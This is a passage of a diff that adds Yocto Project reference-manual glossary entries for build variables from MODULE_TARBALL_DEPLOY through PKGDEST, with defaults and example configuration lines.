+   :term:`MODULE_TARBALL_DEPLOY`
+      Controls creation of the ``modules-*.tgz`` file. Set this variable to
+      "0" to disable creation of this file, which contains all of the
+      kernel modules resulting from a kernel build.
+
+   :term:`MODULE_TARBALL_LINK_NAME`
+      The link name of the kernel module tarball. This variable is set in
+      the ``meta/classes/kernel-artifact-names.bbclass`` file as follows:
+      ::
+
+         MODULE_TARBALL_LINK_NAME ?= "${KERNEL_ARTIFACT_LINK_NAME}"
+
+      The value
+      of the ``KERNEL_ARTIFACT_LINK_NAME`` variable, which is set in the
+      same file, has the following value:
+      ::
+
+         KERNEL_ARTIFACT_LINK_NAME ?= "${MACHINE}"
+
+      See the :term:`MACHINE` variable for additional information.
+
+   :term:`MODULE_TARBALL_NAME`
+      The base name of the kernel module tarball. This variable is set in
+      the ``meta/classes/kernel-artifact-names.bbclass`` file as follows:
+      ::
+
+         MODULE_TARBALL_NAME ?= "${KERNEL_ARTIFACT_NAME}"
+
+      The value of the :term:`KERNEL_ARTIFACT_NAME` variable,
+      which is set in the same file, has the following value:
+      ::
+
+         KERNEL_ARTIFACT_NAME ?= "${PKGE}-${PKGV}-${PKGR}-${MACHINE}${IMAGE_VERSION_SUFFIX}"
+
+   :term:`MULTIMACH_TARGET_SYS`
+      Uniquely identifies the type of the target system for which packages
+      are being built. This variable allows output for different types of
+      target systems to be put into different subdirectories of the same
+      output directory.
+
+      The default value of this variable is:
+      ::
+
+         ${PACKAGE_ARCH}${TARGET_VENDOR}-${TARGET_OS}
+
+      Some classes (e.g.
+      :ref:`cross-canadian <ref-classes-cross-canadian>`) modify the
+      ``MULTIMACH_TARGET_SYS`` value.
+
+      See the :term:`STAMP` variable for an example. See the
+      :term:`STAGING_DIR_TARGET` variable for more information.
+
+   :term:`NATIVELSBSTRING`
+      A string identifying the host distribution. Strings consist of the
+      host distributor ID followed by the release, as reported by the
+      ``lsb_release`` tool or as read from ``/etc/lsb-release``. For
+      example, when running a build on Ubuntu 12.10, the value is
+      "Ubuntu-12.10". If this information is unable to be determined, the
+      value resolves to "Unknown".
+
+      This variable is used by default to isolate native shared state
+      packages for different distributions (e.g. to avoid problems with
+      ``glibc`` version incompatibilities). Additionally, the variable is
+      checked against
+      :term:`SANITY_TESTED_DISTROS` if that
+      variable is set.
+
+   :term:`NM`
+      The minimal command and arguments to run ``nm``.
+
+   :term:`NO_GENERIC_LICENSE`
+      Avoids QA errors when you use a non-common, non-CLOSED license in a
+      recipe. Packages exist, such as the linux-firmware package, with many
+      licenses that are not in any way common. Also, new licenses are added
+      occasionally to avoid introducing a lot of common license files,
+      which are only applicable to a specific package.
+      ``NO_GENERIC_LICENSE`` is used to allow copying a license that does
+      not exist in common licenses.
+
+      The following example shows how to add ``NO_GENERIC_LICENSE`` to a
+      recipe:
+      ::
+
+         NO_GENERIC_LICENSE[license_name] = "license_file_in_fetched_source"
+
+      The following is an example that
+      uses the ``LICENSE.Abilis.txt`` file as the license from the fetched
+      source:
+      ::
+
+         NO_GENERIC_LICENSE[Firmware-Abilis] = "LICENSE.Abilis.txt"
+
+   :term:`NO_RECOMMENDATIONS`
+      Prevents installation of all "recommended-only" packages.
+      Recommended-only packages are packages installed only through the
+      :term:`RRECOMMENDS` variable). Setting the
+      ``NO_RECOMMENDATIONS`` variable to "1" turns this feature on: ::
+
+         NO_RECOMMENDATIONS = "1"
+
+      You can set this variable globally in your ``local.conf`` file or you
+      can attach it to a specific image recipe by using the recipe name
+      override: ::
+
+         NO_RECOMMENDATIONS_pn-target_image = "1"
+
+      It is important to realize that if you choose to not install packages
+      using this variable and some other packages are dependent on them
+      (i.e. listed in a recipe's :term:`RDEPENDS`
+      variable), the OpenEmbedded build system ignores your request and
+      will install the packages to avoid dependency errors.
+
+      .. note::
+
+         Some recommended packages might be required for certain system
+         functionality, such as kernel modules. It is up to you to add
+         packages with the :term:`IMAGE_INSTALL` variable.
+
+      Support for this variable exists only when using the IPK and RPM
+      packaging backend. Support does not exist for DEB.
+
+      See the :term:`BAD_RECOMMENDATIONS` and
+      the :term:`PACKAGE_EXCLUDE` variables for
+      related information.
+
+   :term:`NOAUTOPACKAGEDEBUG`
+      Disables auto package from splitting ``.debug`` files. If a recipe
+      requires ``FILES_${PN}-dbg`` to be set manually, the
+      ``NOAUTOPACKAGEDEBUG`` can be defined allowing you to define the
+      content of the debug package. For example:
+      ::
+
+         NOAUTOPACKAGEDEBUG = "1"
+         FILES_${PN}-dev = "${includedir}/${QT_DIR_NAME}/Qt/*"
+         FILES_${PN}-dbg = "/usr/src/debug/"
+         FILES_${QT_BASE_NAME}-demos-doc = "${docdir}/${QT_DIR_NAME}/qch/qt.qch"
+
+   :term:`OBJCOPY`
+      The minimal command and arguments to run ``objcopy``.
+
+   :term:`OBJDUMP`
+      The minimal command and arguments to run ``objdump``.
+
+   :term:`OE_BINCONFIG_EXTRA_MANGLE`
+      When inheriting the :ref:`binconfig <ref-classes-binconfig>` class,
+      this variable specifies additional arguments passed to the "sed"
+      command. The sed command alters any paths in configuration scripts
+      that have been set up during compilation. Inheriting this class
+      results in all paths in these scripts being changed to point into the
+      ``sysroots/`` directory so that all builds that use the script will
+      use the correct directories for the cross compiling layout.
+
+      See the ``meta/classes/binconfig.bbclass`` in the
+      :term:`Source Directory` for details on how this class
+      applies these additional sed command arguments. For general
+      information on the ``binconfig`` class, see the
+      ":ref:`binconfig.bbclass <ref-classes-binconfig>`" section.
+
+   :term:`OE_IMPORTS`
+      An internal variable used to tell the OpenEmbedded build system what
+      Python modules to import for every Python function run by the system.
+
+      .. note::
+
+         Do not set this variable. It is for internal use only.
+
+   :term:`OE_INIT_ENV_SCRIPT`
+      The name of the build environment setup script for the purposes of
+      setting up the environment within the extensible SDK. The default
+      value is "oe-init-build-env".
+
+      If you use a custom script to set up your build environment, set the
+      ``OE_INIT_ENV_SCRIPT`` variable to its name.
+
+   :term:`OE_TERMINAL`
+      Controls how the OpenEmbedded build system spawns interactive
+      terminals on the host development system (e.g. using the BitBake
+      command with the ``-c devshell`` command-line option). For more
+      information, see the ":ref:`platdev-appdev-devshell`" section in
+      the Yocto Project Development Tasks Manual.
+
+      You can use the following values for the ``OE_TERMINAL`` variable:
+
+      - auto
+      - gnome
+      - xfce
+      - rxvt
+      - screen
+      - konsole
+      - none
+
+   :term:`OEROOT`
+      The directory from which the top-level build environment setup script
+      is sourced. The Yocto Project provides a top-level build environment
+      setup script: :ref:`structure-core-script`. When you run this
+      script, the ``OEROOT`` variable resolves to the directory that
+      contains the script.
+
+      For additional information on how this variable is used, see the
+      initialization script.
+
+   :term:`OLDEST_KERNEL`
+      Declares the oldest version of the Linux kernel that the produced
+      binaries must support. This variable is passed into the build of the
+      Embedded GNU C Library (``glibc``).
+
+      The default for this variable comes from the
+      ``meta/conf/bitbake.conf`` configuration file. You can override this
+      default by setting the variable in a custom distribution
+      configuration file.
+
+   :term:`OVERRIDES`
+      A colon-separated list of overrides that currently apply. Overrides
+      are a BitBake mechanism that allows variables to be selectively
+      overridden at the end of parsing. The set of overrides in
+      ``OVERRIDES`` represents the "state" during building, which includes
+      the current recipe being built, the machine for which it is being
+      built, and so forth.
+
+      As an example, if the string "an-override" appears as an element in
+      the colon-separated list in ``OVERRIDES``, then the following
+      assignment will override ``FOO`` with the value "overridden" at the
+      end of parsing:
+      ::
+
+         FOO_an-override = "overridden"
+
+      See the
+      ":ref:`bitbake:bitbake-user-manual/bitbake-user-manual-metadata:conditional syntax (overrides)`"
+      section in the BitBake User Manual for more information on the
+      overrides mechanism.
+
+      The default value of ``OVERRIDES`` includes the values of the
+      :term:`CLASSOVERRIDE`,
+      :term:`MACHINEOVERRIDES`, and
+      :term:`DISTROOVERRIDES` variables. Another
+      important override included by default is ``pn-${PN}``. This override
+      allows variables to be set for a single recipe within configuration
+      (``.conf``) files. Here is an example:
+      ::
+
+         FOO_pn-myrecipe = "myrecipe-specific value"
+
+      .. note::
+
+         An easy way to see what overrides apply is to search for ``OVERRIDES``
+         in the output of the ``bitbake -e`` command. See the
+         ":ref:`dev-debugging-viewing-variable-values`" section in the Yocto
+         Project Development Tasks Manual for more information.
+
+   :term:`P`
+      The recipe name and version. ``P`` is comprised of the following:
+      ::
+
+         ${PN}-${PV}
+
+   :term:`PACKAGE_ADD_METADATA`
+      This variable defines additional metdata to add to packages.
+
+      You may find you need to inject additional metadata into packages.
+      This variable allows you to do that by setting the injected data as
+      the value. Multiple fields can be added by splitting the content with
+      the literal separator "\n".
+
+      The suffixes '_IPK', '_DEB', or '_RPM' can be applied to the variable
+      to do package type specific settings. It can also be made package
+      specific by using the package name as a suffix.
+
+      You can find out more about applying this variable in the
+      ":ref:`dev-manual/dev-manual-common-tasks:adding custom metadata to packages`"
+      section in the Yocto Project Development Tasks Manual.
+
+   :term:`PACKAGE_ARCH`
+      The architecture of the resulting package or packages.
+
+      By default, the value of this variable is set to
+      :term:`TUNE_PKGARCH` when building for the
+      target, :term:`BUILD_ARCH` when building for the
+      build host, and "${SDK_ARCH}-${SDKPKGSUFFIX}" when building for the
+      SDK.
+
+      .. note::
+
+         See :term:`SDK_ARCH` for more information.
+
+      However, if your recipe's output packages are built specific to the
+      target machine rather than generally for the architecture of the
+      machine, you should set ``PACKAGE_ARCH`` to the value of
+      :term:`MACHINE_ARCH` in the recipe as follows:
+      ::
+
+         PACKAGE_ARCH = "${MACHINE_ARCH}"
+
+   :term:`PACKAGE_ARCHS`
+      Specifies a list of architectures compatible with the target machine.
+      This variable is set automatically and should not normally be
+      hand-edited. Entries are separated using spaces and listed in order
+      of priority. The default value for ``PACKAGE_ARCHS`` is "all any
+      noarch ${PACKAGE_EXTRA_ARCHS} ${MACHINE_ARCH}".
+
+   :term:`PACKAGE_BEFORE_PN`
+      Enables easily adding packages to ``PACKAGES`` before ``${PN}`` so
+      that those added packages can pick up files that would normally be
+      included in the default package.
+
+   :term:`PACKAGE_CLASSES`
+      This variable, which is set in the ``local.conf`` configuration file
+      found in the ``conf`` folder of the
+      :term:`Build Directory`, specifies the package manager the
+      OpenEmbedded build system uses when packaging data.
+
+      You can provide one or more of the following arguments for the
+      variable: PACKAGE_CLASSES ?= "package_rpm package_deb package_ipk
+      package_tar"
+
+      .. note::
+
+         While it is a legal option, the ``package_tar``
+         class has limited functionality due to no support for package
+         dependencies by that backend. Therefore, it is recommended that
+         you do not use it.
+
+      The build system uses only the first argument in the list as the
+      package manager when creating your image or SDK. However, packages
+      will be created using any additional packaging classes you specify.
+      For example, if you use the following in your ``local.conf`` file:
+      ::
+
+         PACKAGE_CLASSES ?= "package_ipk"
+
+      The OpenEmbedded build system uses
+      the IPK package manager to create your image or SDK.
+
+      For information on packaging and build performance effects as a
+      result of the package manager in use, see the
+      ":ref:`package.bbclass <ref-classes-package>`" section.
+
+   :term:`PACKAGE_DEBUG_SPLIT_STYLE`
+      Determines how to split up the binary and debug information when
+      creating ``*-dbg`` packages to be used with the GNU Project Debugger
+      (GDB).
+
+      With the ``PACKAGE_DEBUG_SPLIT_STYLE`` variable, you can control
+      where debug information, which can include or exclude source files,
+      is stored:
+
+      -  ".debug": Debug symbol files are placed next to the binary in a
+         ``.debug`` directory on the target. For example, if a binary is
+         installed into ``/bin``, the corresponding debug symbol files are
+         installed in ``/bin/.debug``. Source files are placed in
+         ``/usr/src/debug``.
+
+      -  "debug-file-directory": Debug symbol files are placed under
+         ``/usr/lib/debug`` on the target, and separated by the path from
+         where the binary is installed. For example, if a binary is
+         installed in ``/bin``, the corresponding debug symbols are
+         installed in ``/usr/lib/debug/bin``. Source files are placed in
+         ``/usr/src/debug``.
+
+      -  "debug-without-src": The same behavior as ".debug" previously
+         described with the exception that no source files are installed.
+
+      -  "debug-with-srcpkg": The same behavior as ".debug" previously
+         described with the exception that all source files are placed in a
+         separate ``*-src`` pkg. This is the default behavior.
+
+      You can find out more about debugging using GDB by reading the
+      ":ref:`platdev-gdb-remotedebug`" section
+      in the Yocto Project Development Tasks Manual.
+
+   :term:`PACKAGE_EXCLUDE_COMPLEMENTARY`
+      Prevents specific packages from being installed when you are
+      installing complementary packages.
+
+      You might find that you want to prevent installing certain packages
+      when you are installing complementary packages. For example, if you
+      are using :term:`IMAGE_FEATURES` to install
+      ``dev-pkgs``, you might not want to install all packages from a
+      particular multilib. If you find yourself in this situation, you can
+      use the ``PACKAGE_EXCLUDE_COMPLEMENTARY`` variable to specify regular
+      expressions to match the packages you want to exclude.
+
+   :term:`PACKAGE_EXCLUDE`
+      Lists packages that should not be installed into an image. For
+      example:
+      ::
+
+         PACKAGE_EXCLUDE = "package_name package_name package_name ..."
+
+      You can set this variable globally in your ``local.conf`` file or you
+      can attach it to a specific image recipe by using the recipe name
+      override:
+      ::
+
+         PACKAGE_EXCLUDE_pn-target_image = "package_name"
+
+      If you choose to not install a package using this variable and some
+      other package is dependent on it (i.e. listed in a recipe's
+      :term:`RDEPENDS` variable), the OpenEmbedded build
+      system generates a fatal installation error. Because the build system
+      halts the process with a fatal error, you can use the variable with
+      an iterative development process to remove specific components from a
+      system.
+
+      Support for this variable exists only when using the IPK and RPM
+      packaging backend. Support does not exist for DEB.
+
+      See the :term:`NO_RECOMMENDATIONS` and the
+      :term:`BAD_RECOMMENDATIONS` variables for
+      related information.
+
+   :term:`PACKAGE_EXTRA_ARCHS`
+      Specifies the list of architectures compatible with the device CPU.
+      This variable is useful when you build for several different devices
+      that use miscellaneous processors such as XScale and ARM926-EJS.
+
+   :term:`PACKAGE_FEED_ARCHS`
+      Optionally specifies the package architectures used as part of the
+      package feed URIs during the build. When used, the
+      ``PACKAGE_FEED_ARCHS`` variable is appended to the final package feed
+      URI, which is constructed using the
+      :term:`PACKAGE_FEED_URIS` and
+      :term:`PACKAGE_FEED_BASE_PATHS`
+      variables.
+
+      .. note::
+
+         You can use the ``PACKAGE_FEED_ARCHS``
+         variable to whitelist specific package architectures. If you do
+         not need to whitelist specific architectures, which is a common
+         case, you can omit this variable. Omitting the variable results in
+         all available architectures for the current machine being included
+         into remote package feeds.
+
+      Consider the following example where the ``PACKAGE_FEED_URIS``,
+      ``PACKAGE_FEED_BASE_PATHS``, and ``PACKAGE_FEED_ARCHS`` variables are
+      defined in your ``local.conf`` file:
+      ::
+
+         PACKAGE_FEED_URIS = "https://example.com/packagerepos/release \
+                              https://example.com/packagerepos/updates"
+         PACKAGE_FEED_BASE_PATHS = "rpm rpm-dev"
+         PACKAGE_FEED_ARCHS = "all core2-64"
+
+      Given these settings, the resulting package feeds are as follows:
+
+      .. code-block:: none
+
+         https://example.com/packagerepos/release/rpm/all
+         https://example.com/packagerepos/release/rpm/core2-64
+         https://example.com/packagerepos/release/rpm-dev/all
+         https://example.com/packagerepos/release/rpm-dev/core2-64
+         https://example.com/packagerepos/updates/rpm/all
+         https://example.com/packagerepos/updates/rpm/core2-64
+         https://example.com/packagerepos/updates/rpm-dev/all
+         https://example.com/packagerepos/updates/rpm-dev/core2-64
+
+   :term:`PACKAGE_FEED_BASE_PATHS`
+      Specifies the base path used when constructing package feed URIs. The
+      ``PACKAGE_FEED_BASE_PATHS`` variable makes up the middle portion of a
+      package feed URI used by the OpenEmbedded build system. The base path
+      lies between the :term:`PACKAGE_FEED_URIS`
+      and :term:`PACKAGE_FEED_ARCHS` variables.
+
+      Consider the following example where the ``PACKAGE_FEED_URIS``,
+      ``PACKAGE_FEED_BASE_PATHS``, and ``PACKAGE_FEED_ARCHS`` variables are
+      defined in your ``local.conf`` file:
+      ::
+
+         PACKAGE_FEED_URIS = "https://example.com/packagerepos/release \
+                              https://example.com/packagerepos/updates"
+         PACKAGE_FEED_BASE_PATHS = "rpm rpm-dev"
+         PACKAGE_FEED_ARCHS = "all core2-64"
+
+      Given these settings, the resulting package feeds are as follows:
+
+      .. code-block:: none
+
+         https://example.com/packagerepos/release/rpm/all
+         https://example.com/packagerepos/release/rpm/core2-64
+         https://example.com/packagerepos/release/rpm-dev/all
+         https://example.com/packagerepos/release/rpm-dev/core2-64
+         https://example.com/packagerepos/updates/rpm/all
+         https://example.com/packagerepos/updates/rpm/core2-64
+         https://example.com/packagerepos/updates/rpm-dev/all
+         https://example.com/packagerepos/updates/rpm-dev/core2-64
+
+   :term:`PACKAGE_FEED_URIS`
+      Specifies the front portion of the package feed URI used by the
+      OpenEmbedded build system. Each final package feed URI is comprised
+      of ``PACKAGE_FEED_URIS``,
+      :term:`PACKAGE_FEED_BASE_PATHS`, and
+      :term:`PACKAGE_FEED_ARCHS` variables.
+
+      Consider the following example where the ``PACKAGE_FEED_URIS``,
+      ``PACKAGE_FEED_BASE_PATHS``, and ``PACKAGE_FEED_ARCHS`` variables are
+      defined in your ``local.conf`` file:
+      ::
+
+         PACKAGE_FEED_URIS = "https://example.com/packagerepos/release \
+                              https://example.com/packagerepos/updates"
+         PACKAGE_FEED_BASE_PATHS = "rpm rpm-dev"
+         PACKAGE_FEED_ARCHS = "all core2-64"
+
+      Given these settings, the resulting package feeds are as follows:
+
+      .. code-block:: none
+
+         https://example.com/packagerepos/release/rpm/all
+         https://example.com/packagerepos/release/rpm/core2-64
+         https://example.com/packagerepos/release/rpm-dev/all
+         https://example.com/packagerepos/release/rpm-dev/core2-64
+         https://example.com/packagerepos/updates/rpm/all
+         https://example.com/packagerepos/updates/rpm/core2-64
+         https://example.com/packagerepos/updates/rpm-dev/all
+         https://example.com/packagerepos/updates/rpm-dev/core2-64
+
+   :term:`PACKAGE_INSTALL`
+      The final list of packages passed to the package manager for
+      installation into the image.
+
+      Because the package manager controls actual installation of all
+      packages, the list of packages passed using ``PACKAGE_INSTALL`` is
+      not the final list of packages that are actually installed. This
+      variable is internal to the image construction code. Consequently, in
+      general, you should use the
+      :term:`IMAGE_INSTALL` variable to specify
+      packages for installation. The exception to this is when working with
+      the :ref:`core-image-minimal-initramfs <ref-manual/ref-images:images>`
+      image. When working with an initial RAM filesystem (initramfs) image,
+      use the ``PACKAGE_INSTALL`` variable. For information on creating an
+      initramfs, see the ":ref:`building-an-initramfs-image`" section
+      in the Yocto Project Development Tasks Manual.
+
+   :term:`PACKAGE_INSTALL_ATTEMPTONLY`
+      Specifies a list of packages the OpenEmbedded build system attempts
+      to install when creating an image. If a listed package fails to
+      install, the build system does not generate an error. This variable
+      is generally not user-defined.
+
+   :term:`PACKAGE_PREPROCESS_FUNCS`
+      Specifies a list of functions run to pre-process the
+      :term:`PKGD` directory prior to splitting the files out
+      to individual packages.
+
+   :term:`PACKAGE_WRITE_DEPS`
+      Specifies a list of dependencies for post-installation and
+      pre-installation scripts on native/cross tools. If your
+      post-installation or pre-installation script can execute at rootfs
+      creation time rather than on the target but depends on a native tool
+      in order to execute, you need to list the tools in
+      ``PACKAGE_WRITE_DEPS``.
+
+      For information on running post-installation scripts, see the
+      ":ref:`dev-manual/dev-manual-common-tasks:post-installation scripts`"
+      section in the Yocto Project Development Tasks Manual.
+
+   :term:`PACKAGECONFIG`
+      This variable provides a means of enabling or disabling features of a
+      recipe on a per-recipe basis. ``PACKAGECONFIG`` blocks are defined in
+      recipes when you specify features and then arguments that define
+      feature behaviors. Here is the basic block structure (broken over
+      multiple lines for readability):
+      ::
+
+         PACKAGECONFIG ??= "f1 f2 f3 ..."
+         PACKAGECONFIG[f1] = "\
+             --with-f1, \
+             --without-f1, \
+             build-deps-for-f1, \
+             runtime-deps-for-f1, \
+             runtime-recommends-for-f1, \
+             packageconfig-conflicts-for-f1"
+         PACKAGECONFIG[f2] = "\
+              ... and so on and so on ...
+
+      The ``PACKAGECONFIG`` variable itself specifies a space-separated
+      list of the features to enable. Following the features, you can
+      determine the behavior of each feature by providing up to six
+      order-dependent arguments, which are separated by commas. You can
+      omit any argument you like but must retain the separating commas. The
+      order is important and specifies the following:
+
+      1. Extra arguments that should be added to the configure script
+         argument list (:term:`EXTRA_OECONF` or
+         :term:`PACKAGECONFIG_CONFARGS`) if
+         the feature is enabled.
+
+      2. Extra arguments that should be added to ``EXTRA_OECONF`` or
+         ``PACKAGECONFIG_CONFARGS`` if the feature is disabled.
+
+      3. Additional build dependencies (:term:`DEPENDS`)
+         that should be added if the feature is enabled.
+
+      4. Additional runtime dependencies (:term:`RDEPENDS`)
+         that should be added if the feature is enabled.
+
+      5. Additional runtime recommendations
+         (:term:`RRECOMMENDS`) that should be added if
+         the feature is enabled.
+
+      6. Any conflicting (that is, mutually exclusive) ``PACKAGECONFIG``
+         settings for this feature.
+
+      Consider the following ``PACKAGECONFIG`` block taken from the
+      ``librsvg`` recipe. In this example the feature is ``gtk``, which has
+      three arguments that determine the feature's behavior.
+      ::
+
+         PACKAGECONFIG[gtk] = "--with-gtk3,--without-gtk3,gtk+3"
+
+      The
+      ``--with-gtk3`` and ``gtk+3`` arguments apply only if the feature is
+      enabled. In this case, ``--with-gtk3`` is added to the configure
+      script argument list and ``gtk+3`` is added to ``DEPENDS``. On the
+      other hand, if the feature is disabled say through a ``.bbappend``
+      file in another layer, then the second argument ``--without-gtk3`` is
+      added to the configure script instead.
+
+      The basic ``PACKAGECONFIG`` structure previously described holds true
+      regardless of whether you are creating a block or changing a block.
+      When creating a block, use the structure inside your recipe.
+
+      If you want to change an existing ``PACKAGECONFIG`` block, you can do
+      so one of two ways:
+
+      -  *Append file:* Create an append file named
+         recipename\ ``.bbappend`` in your layer and override the value of
+         ``PACKAGECONFIG``. You can either completely override the
+         variable:
+         ::
+
+            PACKAGECONFIG = "f4 f5"
+
+         Or, you can just append the variable:
+         ::
+
+            PACKAGECONFIG_append = " f4"
+
+      -  *Configuration file:* This method is identical to changing the
+         block through an append file except you edit your ``local.conf``
+         or ``mydistro.conf`` file. As with append files previously
+         described, you can either completely override the variable:
+         ::
+
+            PACKAGECONFIG_pn-recipename = "f4 f5"
+
+         Or, you can just amend the variable:
+         ::
+
+            PACKAGECONFIG_append_pn-recipename = " f4"
+
+   :term:`PACKAGECONFIG_CONFARGS`
+      A space-separated list of configuration options generated from the
+      :term:`PACKAGECONFIG` setting.
+
+      Classes such as :ref:`autotools <ref-classes-autotools>` and
+      :ref:`cmake <ref-classes-cmake>` use ``PACKAGECONFIG_CONFARGS`` to
+      pass ``PACKAGECONFIG`` options to ``configure`` and ``cmake``,
+      respectively. If you are using ``PACKAGECONFIG`` but not a class that
+      handles the ``do_configure`` task, then you need to use
+      ``PACKAGECONFIG_CONFARGS`` appropriately.
+
+   :term:`PACKAGEGROUP_DISABLE_COMPLEMENTARY`
+      For recipes inheriting the
+      :ref:`packagegroup <ref-classes-packagegroup>` class, setting
+      ``PACKAGEGROUP_DISABLE_COMPLEMENTARY`` to "1" specifies that the
+      normal complementary packages (i.e. ``-dev``, ``-dbg``, and so forth)
+      should not be automatically created by the ``packagegroup`` recipe,
+      which is the default behavior.
+
+   :term:`PACKAGES`
+      The list of packages the recipe creates. The default value is the
+      following:
+      ::
+
+         ${PN}-dbg ${PN}-staticdev ${PN}-dev ${PN}-doc ${PN}-locale ${PACKAGE_BEFORE_PN} ${PN}
+
+      During packaging, the :ref:`ref-tasks-package` task
+      goes through ``PACKAGES`` and uses the :term:`FILES`
+      variable corresponding to each package to assign files to the
+      package. If a file matches the ``FILES`` variable for more than one
+      package in ``PACKAGES``, it will be assigned to the earliest
+      (leftmost) package.
+
+      Packages in the variable's list that are empty (i.e. where none of
+      the patterns in ``FILES_``\ pkg match any files installed by the
+      :ref:`ref-tasks-install` task) are not generated,
+      unless generation is forced through the
+      :term:`ALLOW_EMPTY` variable.
+
+   :term:`PACKAGES_DYNAMIC`
+      A promise that your recipe satisfies runtime dependencies for
+      optional modules that are found in other recipes.
+      ``PACKAGES_DYNAMIC`` does not actually satisfy the dependencies, it
+      only states that they should be satisfied. For example, if a hard,
+      runtime dependency (:term:`RDEPENDS`) of another
+      package is satisfied at build time through the ``PACKAGES_DYNAMIC``
+      variable, but a package with the module name is never actually
+      produced, then the other package will be broken. Thus, if you attempt
+      to include that package in an image, you will get a dependency
+      failure from the packaging system during the
+      :ref:`ref-tasks-rootfs` task.
+
+      Typically, if there is a chance that such a situation can occur and
+      the package that is not created is valid without the dependency being
+      satisfied, then you should use :term:`RRECOMMENDS`
+      (a soft runtime dependency) instead of ``RDEPENDS``.
+
+      For an example of how to use the ``PACKAGES_DYNAMIC`` variable when
+      you are splitting packages, see the
+      ":ref:`dev-manual/dev-manual-common-tasks:handling optional module packaging`"
+      section in the Yocto Project Development Tasks Manual.
+
+   :term:`PACKAGESPLITFUNCS`
+      Specifies a list of functions run to perform additional splitting of
+      files into individual packages. Recipes can either prepend to this
+      variable or prepend to the ``populate_packages`` function in order to
+      perform additional package splitting. In either case, the function
+      should set :term:`PACKAGES`,
+      :term:`FILES`, :term:`RDEPENDS` and
+      other packaging variables appropriately in order to perform the
+      desired splitting.
+
+   :term:`PARALLEL_MAKE`
+      Extra options passed to the ``make`` command during the
+      :ref:`ref-tasks-compile` task in order to specify
+      parallel compilation on the local build host. This variable is
+      usually in the form "-j x", where x represents the maximum number of
+      parallel threads ``make`` can run.
+
+      .. note::
+
+         In order for ``PARALLEL_MAKE`` to be effective, ``make`` must be
+         called with ``${``\ :term:`EXTRA_OEMAKE`\ ``}``. An easy way to ensure
+         this is to use the ``oe_runmake`` function.
+
+      By default, the OpenEmbedded build system automatically sets this
+      variable to be equal to the number of cores the build system uses.
+
+      .. note::
+
+         If the software being built experiences dependency issues during
+         the ``do_compile`` task that result in race conditions, you can clear
+         the ``PARALLEL_MAKE`` variable within the recipe as a workaround. For
+         information on addressing race conditions, see the
+         ":ref:`dev-manual/dev-manual-common-tasks:debugging parallel make races`"
+         section in the Yocto Project Development Tasks Manual.
+
+      For single socket systems (i.e. one CPU), you should not have to
+      override this variable to gain optimal parallelism during builds.
+      However, if you have very large systems that employ multiple physical
+      CPUs, you might want to make sure the ``PARALLEL_MAKE`` variable is
+      not set higher than "-j 20".
+
+      For more information on speeding up builds, see the
+      ":ref:`dev-manual/dev-manual-common-tasks:speeding up a build`"
+      section in the Yocto Project Development Tasks Manual.
+
+   :term:`PARALLEL_MAKEINST`
+      Extra options passed to the ``make install`` command during the
+      :ref:`ref-tasks-install` task in order to specify
+      parallel installation. This variable defaults to the value of
+      :term:`PARALLEL_MAKE`.
+
+      .. note::
+
+         In order for ``PARALLEL_MAKEINST`` to be effective, ``make`` must
+         be called with
+         ``${``\ :term:`EXTRA_OEMAKE`\ ``}``. An easy
+         way to ensure this is to use the ``oe_runmake`` function.
+
+         If the software being built experiences dependency issues during
+         the ``do_install`` task that result in race conditions, you can
+         clear the ``PARALLEL_MAKEINST`` variable within the recipe as a
+         workaround. For information on addressing race conditions, see the
+         ":ref:`dev-manual/dev-manual-common-tasks:debugging parallel make races`"
+         section in the Yocto Project Development Tasks Manual.
+
+   :term:`PATCHRESOLVE`
+      Determines the action to take when a patch fails. You can set this
+      variable to one of two values: "noop" and "user".
+
+      The default value of "noop" causes the build to simply fail when the
+      OpenEmbedded build system cannot successfully apply a patch. Setting
+      the value to "user" causes the build system to launch a shell and
+      places you in the right location so that you can manually resolve the
+      conflicts.
+
+      Set this variable in your ``local.conf`` file.
+
+   :term:`PATCHTOOL`
+      Specifies the utility used to apply patches for a recipe during the
+      :ref:`ref-tasks-patch` task. You can specify one of
+      three utilities: "patch", "quilt", or "git". The default utility used
+      is "quilt" except for the quilt-native recipe itself. Because the
+      quilt tool is not available at the time quilt-native is being
+      patched, it uses "patch".
+
+      If you wish to use an alternative patching tool, set the variable in
+      the recipe using one of the following:
+      ::
+
+         PATCHTOOL = "patch"
+         PATCHTOOL = "quilt"
+         PATCHTOOL = "git"
+
+   :term:`PE`
+      The epoch of the recipe. By default, this variable is unset. The
+      variable is used to make upgrades possible when the versioning scheme
+      changes in some backwards incompatible way.
+
+      ``PE`` is the default value of the :term:`PKGE` variable.
+
+   :term:`PF`
+      Specifies the recipe or package name and includes all version and
+      revision numbers (i.e. ``glibc-2.13-r20+svnr15508/`` and
+      ``bash-4.2-r1/``). This variable is comprised of the following:
+      ${:term:`PN`}-${:term:`EXTENDPE`}${:term:`PV`}-${:term:`PR`}
+
+   :term:`PIXBUF_PACKAGES`
+      When inheriting the :ref:`pixbufcache <ref-classes-pixbufcache>`
+      class, this variable identifies packages that contain the pixbuf
+      loaders used with ``gdk-pixbuf``. By default, the ``pixbufcache``
+      class assumes that the loaders are in the recipe's main package (i.e.
+      ``${``\ :term:`PN`\ ``}``). Use this variable if the
+      loaders you need are in a package other than that main package.
+
+   :term:`PKG`
+      The name of the resulting package created by the OpenEmbedded build
+      system.
+
+      .. note::
+
+         When using the ``PKG`` variable, you must use a package name override.
+
+      For example, when the :ref:`debian <ref-classes-debian>` class
+      renames the output package, it does so by setting
+      ``PKG_packagename``.
+
+   :term:`PKG_CONFIG_PATH`
+      The path to ``pkg-config`` files for the current build context.
+      ``pkg-config`` reads this variable from the environment.
+
+   :term:`PKGD`
+      Points to the destination directory for files to be packaged before
+      they are split into individual packages. This directory defaults to
+      the following:
+      ::
+
+         ${WORKDIR}/package
+
+      Do not change this default.
+
+   :term:`PKGDATA_DIR`
+      Points to a shared, global-state directory that holds data generated
+      during the packaging process. During the packaging process, the
+      :ref:`ref-tasks-packagedata` task packages data
+      for each recipe and installs it into this temporary, shared area.
+      This directory defaults to the following, which you should not
+      change:
+      ::
+
+         ${STAGING_DIR_HOST}/pkgdata
+
+      For examples of how this data is used, see the
+      ":ref:`overview-manual/overview-manual-concepts:automatically added runtime dependencies`"
+      section in the Yocto Project Overview and Concepts Manual and the
+      ":ref:`dev-manual/dev-manual-common-tasks:viewing package information with \`\`oe-pkgdata-util\`\``"
+      section in the Yocto Project Development Tasks Manual. For more
+      information on the shared, global-state directory, see
+      :term:`STAGING_DIR_HOST`.
+
+   :term:`PKGDEST`
